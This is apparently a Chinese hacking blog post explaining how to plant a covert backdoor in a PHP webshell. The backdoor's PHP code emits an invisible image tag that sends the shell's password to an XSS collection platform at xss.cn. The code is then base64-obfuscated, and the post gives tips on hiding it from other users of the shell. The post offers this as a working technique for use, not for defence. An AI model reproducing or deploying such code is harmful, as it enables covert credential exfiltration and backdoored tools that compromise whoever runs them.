Part 1 引子

　　說什麽好呢，發個圖就當個引子好了。

Part 2 XSS平臺

　　創建項目

　　選擇類型

　　xss代碼

　　小實驗，刷新代碼

　　XSS平臺上

Part 3 後門

　我們寫這樣一個腳本

<?php
$password = ‘admin‘;  // 假設這個大馬密碼
                              // 這個是你自己的xss代碼 
echo ‘<img width=0height=0 src="http://xss.cn/xss.php?do=api&id=c7rL&location=‘.$password
 
.‘"/>‘;

　　瀏覽器，運行腳本

　　XSS平臺上

　　　加密XSS代碼

　　最終腳本

<?php
$password = ‘hacksb‘;  // 假設這個大馬密碼
$url = ‘base64加密代碼‘;
$hm = base64_decode($url);
echo $hm.$password.‘ "/>‘;

　　測試下，運行腳本。

<?php
$password = ‘hacksb‘; 
$url = ‘PGltZB3aWR0aD0waGVpZ2h0PTAgc3JjPJodHRwOi8veHzMS5jbi94c3MucGhwP2RvPWFwaSZpZD1jNJmxvY2F0a9uPQ==‘;
 
$hm = base64_decode($url);
echo $hm.$password.‘ "/>‘;

　　XSS平臺上

Part 3 利用

　　找個大馬。

　　插入後門代碼。總之，盡可能不被別人輕而易舉識破。還有變量名不要和大馬本身沖突。

　　運行大馬。

　　XSS平臺上。嘿嘿嘿

　Part 4 後記

　　這後門還不夠完善，例如抓包,F12後門就漏出來了，有待完善。例如後門代碼只運行一次，本地測試環境不執行後門代碼。

參考： https://bbs.ichunqiu.com/thread-18486-1-1.html

給你的PHP大馬添加後門(黑吃黑)